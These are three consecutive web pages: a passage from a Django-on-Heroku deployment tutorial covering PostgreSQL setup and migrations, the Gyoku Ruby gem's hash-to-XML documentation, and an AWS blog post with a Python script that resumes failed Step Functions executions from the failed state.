master branches. If you’ve followed along and created your repository with the
git init command, then your default branch should be named
master. Alternatively, if you created it on GitHub, then it will be named
main.
Since both the
main and
master branches exist on the remote Heroku server, you can use a shorthand syntax to trigger the build and deployment:
$ git push heroku master
Here,
master refers to both your local and remote branch. If you’d like to push a different local branch, then specify its name, such as
bugfix/stack-overflow, followed by a colon (
:) and the remote target branch:
$ git push heroku bugfix/stack-overflow:master
Let’s push the default branch to Heroku now and see what happens next:
$ git push heroku master
(...)
remote: Compressing source files... done.
remote: Building source:
remote:
remote: -----> Building on the Heroku-20 stack
remote: -----> Determining which buildpack to use for this app
remote: -----> Python app detected
remote: -----> Using Python version specified in runtime.txt
remote: -----> Installing python-3.9.6
remote: -----> Installing pip 20.2.4, setuptools 47.1.1 and wheel 0.36.2
remote: -----> Installing SQLite3
remote: -----> Installing requirements with pip
(...)
remote: -----> Compressing...
remote:        Done: 60.6M
remote: -----> Launching...
remote:        Released v6
remote:        deployed to Heroku
remote:
remote: Verifying deploy... done.
To
 * [new branch]      master -> master
Pushing code to Heroku is just like pushing to GitHub, Bitbucket, or another remote Git server. Apart from that, however, it also starts the build process along the way. Heroku will determine the right buildpack based on your project files. It will use the Python interpreter specified in your
runtime.txt file and install dependencies from
requirements.txt.
In practice, it’s more convenient to push your code only once to the Git server of your choice, such as GitHub, and let it trigger the build on Heroku through a webhook. You can read about GitHub Integration in Heroku’s official documentation if you’d like to explore that further.
Note: The first time you push code to Heroku, it may take a while because the platform needs to spin up a new Python environment, install the dependencies, and build an image for its containers. However, subsequent deployments will be faster as the installed dependencies will be already cached.
You can navigate your browser to the public URL of the Heroku app. Alternatively, typing the
heroku open command in your terminal will do it for you:
Congratulations! You’ve just made your project publicly available.
Step 8: Set Up a Relational Database
Well done! You’re almost finished with setting up the hosting for your Django project on Heroku. There’s one final piece of the equation, so hang on for a minute or two.
Up until now, you’ve been using a file-based SQLite database preconfigured by Django. It’s suitable for testing on your local computer but won’t work in the cloud. Heroku has an ephemeral file system, which forgets all changes since your last deployment or a server restart. You need a standalone database engine to persist your data in the cloud.
In this tutorial, you’ll be using a free PostgreSQL instance offered by Heroku as a fully-managed database as a service. You can use a different database engine if you want, but PostgreSQL usually doesn’t require additional configuration.
Provision a PostgreSQL Server
When Heroku detects the Django framework in your project, it automatically spins up a free but limited PostgreSQL instance. It sets up the
DATABASE_URL environment variable with a public URL for your app’s database. The provisioning takes place when you first deploy your app, which can be confirmed by checking the enabled add-ons and configuration variables:
$ heroku addons

Add-on                                            Plan       Price  State
────────────────────────────────────────────────  ─────────  ─────  ───────
heroku-postgresql (postgresql-trapezoidal-06380)  hobby-dev  free   created
 └─ as DATABASE

The table above shows add-ons and the attachments to the current app (...)

$ heroku config
=== polar-island-08305 Config Vars
DATABASE_URL: postgres://ytfeiommjakmxb...amazonaws.com:5432/dcf99cdrgdaqba
SECRET_KEY:   6aj9il2xu2vqwvnitsg@!+4-8t3%zwr@$agm7x%o%yb2t9ivt%
Normally, you’d need to use that variable in
portfolio/settings.py explicitly, but since you installed the
django-heroku module, there’s no need to specify the database URL or the username and password. It’ll automatically pick up the database URL from the environment variable and configure the settings for you.
Moreover, you don’t have to install a database driver to connect to your PostgreSQL instance provisioned by Heroku. On the other hand, it’s desirable to do local development against the same type of database that’s used in the production environment. It promotes parity between your environments and lets you take advantage of the advanced features provided by a given database engine.
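For the record, if you ever needed to wire the database up by hand, the dj-database-url package (pulled in as a dependency, as the package list below shows) can parse that environment variable. A sketch, not required for this tutorial — the SQLite fallback URL is just an example default for local runs:

# portfolio/settings.py
import dj_database_url

# Parse DATABASE_URL, keep connections alive for up to 10 minutes,
# and fall back to the local SQLite file when the variable is unset.
DATABASES = {
    "default": dj_database_url.config(
        conn_max_age=600,
        default="sqlite:///db.sqlite3",
    )
}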
When you installed
django-heroku, it already fetched
psycopg2 as a transitive dependency:
(portfolio) $ pip list
Package         Version
--------------- -------
asgiref         3.4.1
dj-database-url 0.5.0
Django          3.2.5
django-heroku   0.3.1
pip             21.1.3
psycopg2        2.9.1
pytz            2021.1
setuptools      56.0.0
sqlparse        0.4.1
whitenoise      5.2.0
psycopg2 is a Python driver for the PostgreSQL database. Since the driver is already present in your environment, you’re ready to start using PostgreSQL in your app right away.
On the free hobby-dev plan, Heroku imposes some limits. You can have at most 10,000 rows, which must fit within 1 GB of storage, and no more than 20 simultaneous connections to your database. There's no cache, and the performance is capped, among other constraints.
At any time, you can use the
heroku pg command to view the details about your PostgreSQL database provisioned by Heroku:
$ heroku pg
=== DATABASE_URL
Plan:                  Hobby-dev
Status:                Available
Connections:           1/20
PG Version:            13.3
Created:               2021-07-02 08:55 UTC
Data Size:             7.9 MB
Tables:                0
Rows:                  0/10000 (In compliance) - refreshing
Fork/Follow:           Unsupported
Rollback:              Unsupported
Continuous Protection: Off
Add-on:                postgresql-trapezoidal-06380
This short summary contains information about the current number of connections, your database size, the number of tables and rows, and so on.
In the following subsection, you’ll find out how to do something useful with your PostgreSQL database on Heroku.
Update Remote Database Schema
When you define new models in your Django apps, you typically make new migration files and apply them against a database. To update your remote PostgreSQL instance’s schema, you need to run the same migration commands as before, only on the Heroku environment. You’ll see the recommended way of doing this later, but for now, you can run the appropriate command manually:
$ heroku run python manage.py migrate
Running python manage.py migrate on ⬢ polar-island-08305... up, run.1434 (Free)
Operations to perform:
  Apply all migrations: admin, auth, contenttypes, sessions
Running migrations:
  Applying contenttypes.0001_initial... OK
  Applying auth.0001_initial... OK
  (...)
The
run plugin starts a temporary container called a one-off dyno, which is similar to a Docker container that has access to your app’s source code and its configuration. Since dynos are running Linux containers, you can execute any command in one of them, including an interactive terminal session:
$ heroku run bash
Running bash on ⬢ polar-island-08305... up, run.9405 (Free)
(~) $ python manage.py migrate
Operations to perform:
  Apply all migrations: admin, auth, contenttypes, sessions
Running migrations:
  No migrations to apply.
Running the Bash shell inside a temporary dyno is a common practice to inspect or manipulate the state of your Heroku app. You can think of it as logging in to a remote server. The only difference is that you’re starting a throwaway virtual machine, which contains a copy of your project files and receives the same environment variables as your live web dyno.
However, this way of running your database migrations isn’t the most reliable because you might forget about it or make a mistake down the road. You’re better off automating this step in the
Procfile by adding a release line:
web: python manage.py runserver 0.0.0.0:$PORT
release: python manage.py migrate
Now, every time you make a new release, Heroku will take care of applying any pending migrations:
$ git commit -am "Automate remote migrations"
$ git push heroku master
(...)
remote: Verifying deploy... done.
remote: Running release command...
remote:
remote: Operations to perform:
remote:   Apply all migrations: admin, auth, contenttypes, sessions
remote: Running migrations:
remote:   No migrations to apply.
To
   d9f4c04..ebe7bc5  master -> master
It still lets you choose whether to actually make any new migrations or not. When you’re doing a large migration that can take a while to complete, consider enabling the maintenance mode to avoid corrupting or losing the data while users are working with your app:
$ heroku maintenance:on Enabling maintenance mode for ⬢ polar-island-08305... done
Heroku will display this friendly page while in maintenance mode:
Don’t forget to disable it with
heroku maintenance:off once you’re done with your migration.
Populate the Database
You’ve created the database tables for your Django models by applying migrations, but those tables remain empty for the most part. You’ll want to get some data into them sooner or later. The best way to interact with your database is through the Django admin interface. To start using it, you must first create a superuser remotely:
$ heroku run python manage.py createsuperuser
Running python manage.py createsuperuser on ⬢ polar-island-08305... up, run.2976 (Free)
Username (leave blank to use 'u23948'): admin
Email address: jdoe@company.com
Password:
Password (again):
Superuser created successfully.
Remember to create the superuser in the database hooked up to your remote Heroku app by preceding the corresponding command with
heroku run. After providing a unique name and secure password for the superuser, you’ll be able to log in to the Django admin view and start adding records to your database.
You can access the Django admin view by visiting the
/admin path appended to your unique Heroku app domain name.
Here’s how it should look after logging in:
One option to directly manipulate your remote database would be grabbing the
DATABASE_URL variable from Heroku and deciphering its individual components to connect through your favorite SQL client. Alternatively, the Heroku CLI provides a convenient
psql plugin, which works like the standard PostgreSQL interactive terminal but doesn’t require installing any software:
$ heroku psql
--> Connecting to postgresql-round-16446
psql (10.17 (Ubuntu 10.17-0ubuntu0.18.04.1), server 13.3 (Ubuntu 13.3-1.pgdg20.04+1))
WARNING: psql major version 10, server major version 13.
         Some psql features might not work.
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, bits: 256, compression: off)
Type "help" for help.

polar-island-08305::DATABASE=> SELECT username, email FROM auth_user;
 username |      email
----------+------------------
 admin    | jdoe@company.com
(1 row)
Notice how the
heroku psql command connects you to the correct database on the Heroku infrastructure without requiring any details like the hostname, username, or password. Additionally, you didn’t have to install the PostgreSQL client to query one of the tables using SQL.
As a Django developer, you might be in the habit of relying on its object-relational mapper (ORM) instead of typing SQL queries manually. You can make use of the Heroku CLI again by starting the interactive Django shell in a remote Heroku app:
$ heroku run python manage.py shell
Running python manage.py shell on ⬢ polar-island-08305... up, run.9914 (Free)
Python 3.9.6 (default, Jul 02 2021, 15:33:41)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
(InteractiveConsole)
Next, import the built-in
User model and use its manager to retrieve the corresponding user objects from the database:
>>> from django.contrib.auth.models import User
>>> User.objects.all()
<QuerySet [<User: admin>]>
You should see the superuser that you created before. Using the Django shell lets you query the hooked-up database with an object-oriented API. If you don’t like the default shell, then you can install an alternative Python REPL such as IPython or bpython, and Django will recognize it.
Alright, that’s it! You have a fully-fledged Django project hosted on Heroku with a relational database hooked up. You can now share its public link in your README file on GitHub, for example, to let the world appreciate your work.
Conclusion
Now, you know how to turn your ideas into live web applications that your friends and family will love. Perhaps, someone from an HR department might stumble upon one of your projects and offer you a job. Signing up for a free Heroku account to host your Django code is one of the best ways to enter the world of cloud computing.
In this tutorial, you’ve learned how to:
- Take your Django project online in minutes
- Deploy your project to Heroku using Git
- Use a Django-Heroku integration library
- Hook your Django project up to a standalone relational database
- Manage the configuration along with sensitive data
You can download the final source code as well as the snapshots of the individual steps by following the link below:
Get Source Code: Click here to get the companion Django project as well as snapshots of the individual steps followed in this tutorial.
Next Steps
This tutorial barely scratched the surface when it comes to what’s possible with Heroku. It intentionally glossed over many fine details, but Heroku has much more to offer, even with the limited free account. Here are some ideas to consider if you want to take your project to the next level:
Configure a WSGI Server: Before making your project public, the first thing to do is replace the built-in Django development server with something more secure and performant, like Gunicorn. Django provides a handy deployment checklist with best practices you can go through.
Enable Logging: An app working in the cloud is not directly in your control, which makes debugging and troubleshooting more difficult than if it was running on your local machine. Therefore, you should enable logging with one of Heroku’s add-ons.
Serve static files: Use an external service such as Amazon S3 or a Content-Delivery Network (CDN) to host static resources like CSS, JavaScript, or pictures. This might offload your web server significantly and take advantage of caching for faster downloads.
Serve dynamic content: Due to Heroku’s ephemeral file system, data supplied to your app by the users can’t be persisted as local files. Using a relational or even a NoSQL database isn’t always the most efficient or convenient option. In such situations, you might want to use an external service like Amazon S3.
Add a custom domain: By default, your Heroku apps are hosted on the
.herokuapp.com domain. While it's quick and useful for a hobby project, you'll probably want to use a custom domain in a more professional setting.
Add an SSL certificate: When you define a custom domain, you’ll have to provide a corresponding SSL certificate to expose your app over HTTPS. It’s a must-have in today’s world because some web browser vendors have already announced that they won’t display insecure websites in the future.
Hook up with GitHub: You can automate your deployments by allowing GitHub to trigger a new build and release when a pull request is merged to the master branch. This reduces the number of manual steps and keeps your source code secure.
Use Heroku Pipelines: Heroku encourages you to follow the best practices with minimal effort. It provides a continuous delivery workflow by optionally automating the creation of test environments.
Enable Autoscaling: As your application grows, it will need to face increased demand for resources. Most e-commerce platforms experience a spike in traffic every year around Christmas. The contemporary solution to that problem is horizontal scaling, which replicates your app in multiple copies to keep up with the demand. Autoscaling can respond to such spikes whenever needed.
Split into microservices: Horizontal scaling works best when your project consists of multiple independent microservices, which can be scaled individually. Such an architecture can lead to faster development time but comes with its own set of challenges.
Migrate from Heroku: Once you get your feet wet with Heroku, you might think about migrating to another cloud platform such as Google App Engine or even the underlying Amazon infrastructure to lower your cost.
Go ahead and explore the official documentation and Python tutorials on the Heroku website to find more details about these topics.
|
https://realpython.com/django-hosting-on-heroku/
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
Gyoku
Gyoku translates Ruby Hashes to XML.
Gyoku.xml(:find_user => { :id => 123, "v1:Key" => "api" })
# => "<findUser><id>123</id><v1:Key>api</v1:Key></findUser>"
Installation
Gyoku is available through Rubygems and can be installed via:
$ gem install gyoku
or add it to your Gemfile like this:
gem 'gyoku', '~> 1.0'
Hash keys
Hash key Symbols are converted to lowerCamelCase Strings.
Gyoku.xml(:lower_camel_case => "key")
# => "<lowerCamelCase>key</lowerCamelCase>"
You can change the default conversion formula to
:camelcase,
:upcase or
:none.
Note that options are passed as a second Hash to the
.xml method.
Gyoku.xml({ :camel_case => "key" }, { :key_converter => :camelcase })
# => "<CamelCase>key</CamelCase>"
Hash key Strings are not converted and may contain namespaces.
Gyoku.xml("XML" => "key")
# => "<XML>key</XML>"
Hash values
- DateTime objects are converted to xs:dateTime Strings
- Objects responding to :to_datetime (except Strings) are converted to xs:dateTime Strings
- TrueClass and FalseClass objects are converted to "true" and "false" Strings
- NilClass objects are converted to xsi:nil tags
- These conventions are also applied to the return value of objects responding to :call
- All other objects are converted to Strings using :to_s
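As a quick illustration of these rules, here's a hedged sketch — the exact timezone formatting of the xs:dateTime string and the generated markup may vary slightly with your Ruby and Gyoku versions:

require "gyoku"
require "date"

hash = {
  :active     => true,                      # TrueClass => "true"
  :deleted_at => nil,                       # NilClass  => xsi:nil tag
  :created_at => DateTime.new(2021, 7, 2)   # DateTime  => xs:dateTime String
}

puts Gyoku.xml(hash)
# Output should look roughly like:
# "<active>true</active><deletedAt xsi:nil=\"true\"/><createdAt>2021-07-02T00:00:00+00:00</createdAt>"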
Special characters
Gyoku escapes special characters unless the Hash key ends with an exclamation mark.
Gyoku.xml(:escaped => "<tag />", :not_escaped! => "<tag />")
# => "<escaped>&lt;tag /&gt;</escaped><notEscaped><tag /></notEscaped>"
Self-closing tags
Hash Keys ending with a forward slash create self-closing tags.
Gyoku.xml(:"self_closing/" => "", "selfClosing/" => nil)
# => "<selfClosing/><selfClosing/>"
Sort XML tags
In case you need the XML tags to be in a specific order, you can specify the order
through an additional Array stored under the
:order! key.
Gyoku.xml(:name => "Eve", :id => 1, :order! => [:id, :name])
# => "<id>1</id><name>Eve</name>"
XML attributes
Adding XML attributes is rather ugly, but it can be done by specifying an additional
Hash stored under the
:attributes! key.
Gyoku.xml(:person => "Eve", :attributes! => { :person => { :id => 1 } })
# => "<person id=\"1\">Eve</person>"
Explicit XML Attributes
In addition to using the
:attributes! key, you may also specify attributes through keys beginning with an "@" sign.
Since you'll need to set the attribute within the hash containing the node's contents, a
:content! key can be used
to explicitly set the content of the node. The
:content! value may be a String, Hash, or Array.
This is particularly useful for self-closing tags.
Using :attributes!
Gyoku.xml(
  "foo/" => "",
  :attributes! => { "foo/" => { "bar" => "1", "biz" => "2", "baz" => "3" } }
)
# => "<foo baz=\"3\" bar=\"1\" biz=\"2\"/>"
Using "@" keys and ":content!"
Gyoku.xml(
  "foo/" => { :@bar => "1", :@biz => "2", :@baz => "3", :content! => "" }
)
# => "<foo baz=\"3\" bar=\"1\" biz=\"2\"/>"
Example using "@" to get Array of parent tags each with @attributes & :content!
Gyoku.xml(
  "foo" => [
    { :@name => "bar", :content! => 'gyoku' },
    { :@name => "baz", :@some => "attr", :content! => 'rocks!' }
  ]
)
# => "<foo name=\"bar\">gyoku</foo><foo name=\"baz\" some=\"attr\">rocks!</foo>"
Naturally, it would ignore :content! if tag is self-closing:
Gyoku.xml(
  "foo/" => [
    { :@name => "bar", :content! => 'gyoku' },
    { :@name => "baz", :@some => "attr", :content! => 'rocks!' }
  ]
)
# => "<foo name=\"bar\"/><foo name=\"baz\" some=\"attr\"/>"
This approach is a bit more explicit because the attributes sit next to their values, rather than in a separately maintained hash of attributes.
For backward compatibility,
:attributes! will still work. However, "@" keys will override
:attributes! keys
if there is a conflict.
Gyoku.xml(:person => { :content! => "Adam", :@id! => 0 })
# => "<person id=\"0\">Adam</person>"
Example with ":content!", :attributes! and "@" keys
Gyoku.xml({
  :subtitle => { :@lang => "en", :content! => "It's Godzilla!" },
  :attributes! => { :subtitle => { "lang" => "jp" } }
})
# => "<subtitle lang=\"en\">It's Godzilla!</subtitle>"
The example above shows an example of how you can use all three at the same time.
Notice that we have the attribute "lang" defined twice.
The
@lang value takes precedence over the
:attribute![:subtitle]["lang"] value.
|
https://www.rubydoc.info/gems/gyoku/1.3.1
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
The star(*) operator unpacks the sequence/collection into positional arguments. So if you have a tuple and want to pass the items of that tuple as arguments for each position as they are there in the tuple, instead of indexing each element individually, you could just use the * operator.
def multiply(a, b):
    return a * b

values = (1, 2)
print(multiply(*values))
This will unpack the tuple so that it actually executes as −
print(multiply(1, 2))
This will give the output −
2
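The same unpacking works for a tuple of any length, as long as the number of items matches the function's positional parameters. For instance:

def add(a, b, c):
    return a + b + c

nums = (1, 2, 3)
print(add(*nums))  # Unpacks to add(1, 2, 3) and prints 6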
|
https://www.tutorialspoint.com/How-does-the-operator-work-on-a-tuple-in-Python
|
CC-MAIN-2021-49
|
en
|
refinedweb
|
AWS Compute Blog
Resume AWS Step Functions from Any State
Update March, 5 2021 – Disclaimer: This blog precedes the introduction of map state to the Amazon States Language and requires modifications to work with the map state.
This post is written by Aaron Friedman, Partner Solutions Architect and Yash Pant, Solutions Architect.
When we discuss how to build applications with customers, we often align to the Well Architected Framework pillars of security, reliability, performance efficiency, cost optimization, and operational excellence. Designing for failure is an essential component to developing well architected applications that are resilient to spurious errors that may occur.
There are many ways you can use AWS services to achieve high availability and resiliency of your applications. For example, you can couple Elastic Load Balancing with Auto Scaling and Amazon EC2 instances to build highly available applications. Or use Amazon API Gateway and AWS Lambda to rapidly scale out a microservices-based architecture. Many AWS services have built in solutions to help with the appropriate error handling, such as Dead Letter Queues (DLQ) for Amazon SQS or retries in AWS Batch.
AWS Step Functions is an AWS service that makes it easy for you to coordinate the components of distributed applications and microservices. Step Functions allows you to easily design for failure, by incorporating features such as error retries and custom error handling from AWS Lambda exceptions. These features allow you to programmatically handle many common error modes and build robust, reliable applications.
In some rare cases, however, your application may fail in an unexpected manner. In these situations, you might not want to duplicate in a repeat execution those portions of your state machine that have already run. This is especially true when orchestrating long-running jobs or executing a complex state machine as part of a microservice. Here, you need to know the last successful state in your state machine from which to resume, so that you don’t duplicate previous work. In this post, we present a solution to enable you to resume from any given state in your state machine in the case of an unexpected failure.
Resuming from a given state
To resume a failed state machine execution from the state at which it failed, you first run a script that dynamically creates a new state machine. When the new state machine is executed, it resumes the failed execution from the point of failure. The script contains the following two primary steps:
- Parse the execution history of the failed execution to find the name of the state at which it failed, as well as the JSON input to that state.
- Create a new state machine, which adds an additional state to failed state machine, called “GoToState”. “GoToState” is a choice state at the beginning of the state machine that branches execution directly to the failed state, allowing you to skip states that had succeeded in the previous execution.
The full script along with a CloudFormation template that creates a demo of this is available in the aws-sfn-resume-from-any-state GitHub repo.
Diving into the script
In this section, we walk you through the script and highlight the core components of its functionality. The script contains a main function, which adds a command line parameter for the failedExecutionArn so that you can easily call the script from the command line:
python gotostate.py --failedExecutionArn '<Failed_Execution_Arn>'
Identifying the failed state in your execution
First, the script extracts the name of the failed state along with the input to that state. It does so by using the failed state machine execution history, which is identified by the Amazon Resource Name (ARN) of the execution. The failed state is marked in the execution history, along with the input to that state (which is also the output of the preceding successful state). The script is able to parse these values from the log.
The script loops through the execution history of the failed state machine, and traces it backwards until it finds the failed state. If the state machine failed in a parallel state, then it must restart from the beginning of the parallel state. The script is able to capture the name of the parallel state that failed, rather than any substate within the parallel state that may have caused the failure. The following code is the Python function that does this.
def parseFailureHistory(failedExecutionArn):
    '''
    Parses the execution history of a failed state machine to get the name of
    the failed state and the input to the failed state.
    Input: failedExecutionArn = A string containing the execution ARN of a failed state machine
    Output: A tuple with two elements: (name of failed state, input to failed state)
    '''
    failedAtParallelState = False
    try:
        #Get the execution history
        response = client.get_execution_history(
            executionArn=failedExecutionArn,
            reverseOrder=True
        )
        failedEvents = response['events']
    except Exception as ex:
        raise ex

    #Confirm that the execution actually failed, raise exception if it didn't fail.
    try:
        failedEvents[0]['executionFailedEventDetails']
    except:
        raise Exception('Execution did not fail')

    '''
    If you have a 'States.Runtime' error (for example, if a task state in your
    state machine attempts to execute a Lambda function in a different region
    than the state machine), get the ID of the failed state, and use it to
    determine the failed state name and input.
    '''
    if failedEvents[0]['executionFailedEventDetails']['error'] == 'States.Runtime':
        #Join the filtered digits so this also works on Python 3, where filter returns an iterator
        failedId = int(''.join(filter(str.isdigit, str(failedEvents[0]['executionFailedEventDetails']['cause'].split()[13]))))
        failedState = failedEvents[-1 * failedId]['stateEnteredEventDetails']['name']
        failedInput = failedEvents[-1 * failedId]['stateEnteredEventDetails']['input']
        return (failedState, failedInput)

    '''
    You need to loop through the execution history, tracing back the executed steps.
    The first state you encounter is the failed state. If you failed on a parallel state,
    you need the name of the parallel state rather than the name of a state within
    the parallel state that it failed on. This is because you can only attach GoToState
    to the parallel state, not to a substate within the parallel state.
    This loop starts with the ID of the latest event and uses the previous event IDs
    to trace back the execution to the beginning (id 0). However, it returns as soon
    as it finds the name of the failed state.
    '''
    currentEventId = failedEvents[0]['id']
    while currentEventId != 0:
        #Multiply the event ID by -1 for indexing because you're looking at the reversed history
        currentEvent = failedEvents[-1 * currentEventId]

        '''
        You can determine that the failed state was a parallel state because an event
        with 'type'='ParallelStateFailed' appears in the execution history before the
        name of the failed state.
        '''
        if currentEvent['type'] == 'ParallelStateFailed':
            failedAtParallelState = True

        '''
        If the failed state is not a parallel state, then the name of the failed state to
        return is the name of the state in the first 'TaskStateEntered' event type you run
        into when tracing back the execution history.
        '''
        if currentEvent['type'] == 'TaskStateEntered' and failedAtParallelState == False:
            failedState = currentEvent['stateEnteredEventDetails']['name']
            failedInput = currentEvent['stateEnteredEventDetails']['input']
            return (failedState, failedInput)

        '''
        If the failed state was a parallel state, then you need to trace execution back to
        the first event with 'type'='ParallelStateEntered', and return the name of that state.
        '''
        if currentEvent['type'] == 'ParallelStateEntered' and failedAtParallelState:
            failedState = currentEvent['stateEnteredEventDetails']['name']
            failedInput = currentEvent['stateEnteredEventDetails']['input']
            return (failedState, failedInput)

        #Update the ID for the next iteration of the loop
        currentEventId = currentEvent['previousEventId']
Create the new state machine
The script uses the name of the failed state to create the new state machine, with “GoToState” branching execution directly to the failed state.
To do this, the script requires the Amazon States Language (ASL) definition of the failed state machine. It modifies the definition to append “GoToState”, and create a new state machine from it.
The script derives the ARN of the failed state machine from the execution ARN, and uses it to fetch the state machine's ASL definition by calling the DescribeStateMachine API action. It then creates a new state machine that includes "GoToState".
When the script creates the new state machine, it also adds an additional input variable called “resuming”. When you execute this new state machine, you specify this resuming variable as true in the input JSON. This tells “GoToState” to branch execution to the state that had previously failed. Here’s the function that does this:
def attachGoToState(failedStateName, stateMachineArn):
    '''
    Given a state machine ARN and the name of a state in that state machine, create a
    new state machine that starts at a new choice state called 'GoToState'. "GoToState"
    branches to the named state, and sends the input of the state machine to that state,
    when a variable called "resuming" is set to True.
    Input:  failedStateName = A string with the name of the failed state
            stateMachineArn = A string with the ARN of the state machine
    Output: response from the create_state_machine call, which is the API call that
            creates a new state machine
    '''
    try:
        response = client.describe_state_machine(
            stateMachineArn=stateMachineArn
        )
    except:
        raise Exception('Could not get ASL definition of state machine')

    roleArn = response['roleArn']
    stateMachine = json.loads(response['definition'])

    #Create a name for the new state machine
    newName = response['name'] + '-with-GoToState'

    #Get the StartAt state for the original state machine, because you point 'GoToState' to this state
    originalStartAt = stateMachine['StartAt']

    '''
    Create the GoToState with the variable $.resuming.
    If the new state machine is executed with $.resuming = True, then the state machine
    skips to the failed state. Otherwise, it executes the state machine from the original
    start state.
    '''
    goToState = {
        'Type': 'Choice',
        'Choices': [{'Variable': '$.resuming', 'BooleanEquals': False, 'Next': originalStartAt}],
        'Default': failedStateName
    }

    #Add GoToState to the set of states in the new state machine
    stateMachine['States']['GoToState'] = goToState

    #Add StartAt
    stateMachine['StartAt'] = 'GoToState'

    #Create the new state machine
    try:
        response = client.create_state_machine(
            name=newName,
            definition=json.dumps(stateMachine),
            roleArn=roleArn
        )
    except:
        raise Exception('Failed to create new state machine with GoToState')

    return response
Testing the script
Now that you understand how the script works, you can test it out.
The following screenshot shows an example state machine that has failed, called “TestMachine”. This state machine successfully completed “FirstState” and “ChoiceState”, but when it branched to “FirstMatchState”, it failed.
Use the script to create a new state machine that allows you to rerun this state machine, but skip the “FirstState” and the “ChoiceState” steps that already succeeded. You can do this by calling the script as follows:
python gotostate.py --failedExecutionArn 'arn:aws:states:us-west-2:<AWS_ACCOUNT_ID>:execution:TestMachine-with-GoToState:b2578403-f41d-a2c7-e70c-7500045288595'
This creates a new state machine called “TestMachine-with-GoToState”, and returns its ARN, along with the input that had been sent to “FirstMatchState”. You can then inspect the input to determine what caused the error. In this case, you notice that the input to “FirstMachState” was the following:
{ "foo": 1, "Message": true }
However, this state machine expects the “Message” field of the JSON to be a string rather than a Boolean. Execute the new “TestMachine-with-GoToState” state machine, change the input to be a string, and add the “resuming” variable that “GoToState” requires:
{ "foo": 1, "Message": "Hello!", "resuming":true }
When you execute the new state machine, it skips “FirstState” and “ChoiceState”, and goes directly to “FirstMatchState”, which was the state that failed:
Look at what happens when you have a state machine with multiple parallel steps. This example is included in the GitHub repository associated with this post. The repo contains a CloudFormation template that sets up this state machine and provides instructions to replicate this solution.
The following state machine, “ParallelStateMachine”, takes an input through two subsequent parallel states before doing some final processing and exiting. The JSON below shows the ASL definition of the state machine.
{
  "Comment": "An example of the Amazon States Language using a parallel state to execute two branches at the same time.",
  "StartAt": "Parallel",
  "States": {
    "Parallel": {
      "Type": "Parallel",
      "ResultPath": "$.output",
      "Next": "Parallel 2",
      "Branches": [
        {
          "StartAt": "Parallel Step 1, Process 1",
          "States": {
            "Parallel Step 1, Process 1": {
              "Type": "Task",
              "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaA",
              "End": true
            }
          }
        },
        {
          "StartAt": "Parallel Step 1, Process 2",
          "States": {
            "Parallel Step 1, Process 2": {
              "Type": "Task",
              "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaA",
              "End": true
            }
          }
        }
      ]
    },
    "Parallel 2": {
      "Type": "Parallel",
      "Next": "Final Processing",
      "Branches": [
        {
          "StartAt": "Parallel Step 2, Process 1",
          "States": {
            "Parallel Step 2, Process 1": {
              "Type": "Task",
              "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXXX:function:LambdaB",
              "End": true
            }
          }
        },
        {
          "StartAt": "Parallel Step 2, Process 2",
          "States": {
            "Parallel Step 2, Process 2": {
              "Type": "Task",
              "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaB",
              "End": true
            }
          }
        }
      ]
    },
    "Final Processing": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaC",
      "End": true
    }
  }
}
First, use an input that initially fails:
{ "Message": "Hello!" }
This fails because the state machine expects you to have a variable in the input JSON called “foo” in the second parallel state to run “Parallel Step 2, Process 1” and “Parallel Step 2, Process 2”. Instead, the original input gets processed by the first parallel state and produces the following output to pass to the second parallel state:
{ "output": [ { "Message": "Hello!" }, { "Message": "Hello!" } ] }
Run the script on the failed state machine to create a new state machine that allows it to resume directly at the second parallel state instead of having to redo the first parallel state. This creates a new state machine called “ParallelStateMachine-with-GoToState”. The following JSON was created by the script to define the new state machine in ASL. It contains the “GoToState” value that was attached by the script.
{ "Comment":"An example of the Amazon States Language using a parallel state to execute two branches at the same time.", "States":{ "Final Processing":{ "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaC", "End":true, "Type":"Task" }, "GoToState":{ "Default":"Parallel 2", "Type":"Choice", "Choices":[ { "Variable":"$.resuming", "BooleanEquals":false, "Next":"Parallel" } ] }, "Parallel":{ "Branches":[ { "States":{ "Parallel Step 1, Process 1":{ "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaA", "End":true, "Type":"Task" } }, "StartAt":"Parallel Step 1, Process 1" }, { "States":{ "Parallel Step 1, Process 2":{ "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:LambdaA", "End":true, "Type":"Task" } }, "StartAt":"Parallel Step 1, Process 2" } ], "ResultPath":"$.output", "Type":"Parallel", "Next":"Parallel 2" }, "Parallel 2":{ "Branches":[ { "States":{ "Parallel Step 2, Process 1":{ "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaB", "End":true, "Type":"Task" } }, "StartAt":"Parallel Step 2, Process 1" }, { "States":{ "Parallel Step 2, Process 2":{ "Resource":"arn:aws:lambda:us-west-2:XXXXXXXXXXXX:function:LambdaB", "End":true, "Type":"Task" } }, "StartAt":"Parallel Step 2, Process 2" } ], "Type":"Parallel", "Next":"Final Processing" } }, "StartAt":"GoToState" }
You can then execute this state machine with the correct input by adding the “foo” and “resuming” variables:
{ "foo": 1, "output": [ { "Message": "Hello!" }, { "Message": "Hello!" } ], "resuming": true }
This yields the following result. Notice that this time, the state machine executed successfully to completion, and skipped the steps that had previously failed.
Conclusion
When you’re building out complex workflows, it’s important to be prepared for failure. You can do this by taking advantage of features such as automatic error retries in Step Functions and custom error handling of Lambda exceptions.
Nevertheless, state machines still have the possibility of failing. With the methodology and script presented in this post, you can resume a failed state machine from its point of failure. This allows you to skip the execution of steps in the workflow that had already succeeded, and recover the process from the point of failure.
To see more examples, please visit the Step Functions Getting Started page.
If you have questions or suggestions, please comment below.
|
https://aws.amazon.com/blogs/compute/resume-aws-step-functions-from-any-state/
|
CC-MAIN-2021-49
|
en
|
refinedweb
